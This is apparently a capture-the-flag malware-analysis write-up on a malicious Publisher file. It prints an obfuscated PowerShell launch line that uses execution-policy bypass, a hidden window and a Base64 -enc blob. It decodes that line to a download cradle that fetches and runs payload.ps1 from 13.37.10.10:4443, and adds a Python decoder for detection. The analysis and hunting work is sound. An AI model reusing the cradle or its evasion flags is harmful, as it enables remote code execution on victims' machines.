Publish3r

Challenge:

We believe we found a malicious file on someone’s workstation. Judging by looking at it, the file likely came from a phishing email. Anyways, we’d like you to analyze the sample, so we can see what would have happened if it executed successfully. That way we can hunt for signs of it across the enterprise. Your flag will be the URL that the malware is trying to reach out to! Can you do it? Format: MetaCTF{http://………}

Note: We’ve put the actual file in an encrypted 7z so your browser doesn’t complain when downloading it (and our site doesn’t get flagged as malware). The password is metactf

Solution:

The 7z archive contained a Microsoft Publisher (.pub) file. My first steps were to review the file metadata for any easy clues and to dump printable strings from it (running strings -e l as well is worth the effort, since Office files often store text as UTF-16LE, which plain strings misses). While reviewing the strings output I found a PowerShell command line:

$ strings Publish3r.pub
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -exec Bypass -windowstyle hidden -enc SQBFAHgAIAAoACgAbgBFAFcALQBPAEIASgBlAEMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACgAIgBoAHQAdABwADoALwAvADEAMwAuADMANwAuADEAMAAuADEAMAA6ADQANAA0ADMALwBkAG8AYwAvAHAAYQB5AGwAbwBhAGQALgBwAHMAMQAiACkAKQApAA==

A PowerShell command embedded in a Publisher file is questionable on its own, but the parameters make it highly suspicious:

  1. -exec Bypass (short for -ExecutionPolicy Bypass) turns off the script execution policy for this process. The execution policy is a safety net against accidentally running scripts, not a security boundary, so its main effect here is to suppress prompts and warnings
  2. -windowstyle hidden hides the console window so the user sees nothing while PowerShell runs
  3. -enc (short for -EncodedCommand) tells PowerShell the command is Base64 encoded. Note that it is Base64 over the UTF-16LE bytes of the script, not over ASCII, which is why the blob is full of "A" characters: they encode the 0x00 high byte that follows every ASCII character

We can use the base64 utility to decode the command. Because the payload is UTF-16LE, base64 -d on its own emits a NUL byte after every character (a terminal hides them, but grep and other tools will not), so convert the result with iconv:

printf "SQBFAHgAIAAoACgAbgBFAFcALQBPAEIASgBlAEMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACgAIgBoAHQAdABwADoALwAvADEAMwAuADMANwAuADEAMAAuADEAMAA6ADQANAA0ADMALwBkAG8AYwAvAHAAYQB5AGwAbwBhAGQALgBwAHMAMQAiACkAKQApAA==" | base64 -d | iconv -f UTF-16LE -t UTF-8

IEx ((nEW-OBJeCt net.webclient).downloadstring(("http://13.37.10.10:4443/doc/payload.ps1")))

The decoded command is a classic download cradle: IEx is the alias for Invoke-Expression, and the mixed casing in nEW-OBJeCt is a cheap way to dodge case-sensitive string matching. Had it executed, it would have fetched payload.ps1 from 13.37.10.10 on port 4443 and run it in memory without writing it to disk. That URL is the flag: MetaCTF{http://13.37.10.10:4443/doc/payload.ps1}. For hunting across the enterprise, the indicators are outbound connections to 13.37.10.10:4443, the path /doc/payload.ps1 in proxy logs, and powershell.exe launched with -enc as a child of an Office process.
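As an added example (not part of the original write-up), here is a small Python script that automates the decoding step over raw file bytes: it finds -enc / -EncodedCommand arguments, decodes them as Base64 over UTF-16LE, and pulls out any URLs. The sample input is constructed to mimic the strings pulled from the Publisher file and reuses the Base64 blob from above; the function names are my own.

```python
import base64
import re

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec,
# -en, -enc, ...). Match the switch plus a Base64 blob of at least 16 chars.
ENC_RE = re.compile(
    rb"-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/]{16,}={0,2})", re.IGNORECASE
)
URL_RE = re.compile(r"""https?://[^\s"'()<>]+""", re.IGNORECASE)

# Constructed sample standing in for the bytes `strings` pulled out of the
# Publisher file; the Base64 is the blob from the write-up above.
ENCODED = (
    "SQBFAHgAIAAoACgAbgBFAFcALQBPAEIASgBlAEMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBu"
    "AHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACgAIgBoAHQAdABwADoALwAvADEA"
    "MwAuADMANwAuADEAMAAuADEAMAA6ADQANAA0ADMALwBkAG8AYwAvAHAAYQB5AGwAbwBhAGQALgBw"
    "AHMAMQAiACkAKQApAA=="
)
SAMPLE = (
    b"\x00\x01\xff junk before the command \xfe"
    b"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    b"-exec Bypass -windowstyle hidden -enc " + ENCODED.encode("ascii") +
    b"\x00\x00 junk after the command"
)


def decode_encoded_command(blob: str) -> str:
    """Decode one -EncodedCommand argument.

    -enc is Base64 over the UTF-16LE bytes of the script, so a plain Base64
    decode leaves a NUL after every character; decoding as UTF-16LE removes
    them. A truncated (odd-length) capture yields a replacement character
    instead of raising.
    """
    raw = base64.b64decode(blob, validate=True)
    return raw.decode("utf-16-le", errors="replace").rstrip("\x00")


def find_encoded_commands(data: bytes) -> list[str]:
    """Return every decodable -enc payload found in raw file bytes."""
    found = []
    for match in ENC_RE.finditer(data):
        try:
            found.append(decode_encoded_command(match.group(1).decode("ascii")))
        except ValueError:
            # Not valid Base64 (bad characters or padding): skip the match.
            continue
    return found


def extract_urls(script: str) -> list[str]:
    """Pull http(s) URLs out of a decoded script."""
    return URL_RE.findall(script)


if __name__ == "__main__":
    for cmd in find_encoded_commands(SAMPLE):
        print(cmd)
        print("URLs:", extract_urls(cmd))
```

Run it against the real file with data = open("Publish3r.pub", "rb").read(); because the regex works on raw bytes, it only catches ASCII-encoded command lines, so a UTF-16LE copy of the same string (common in Office documents) would need the file decoded as UTF-16LE first.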
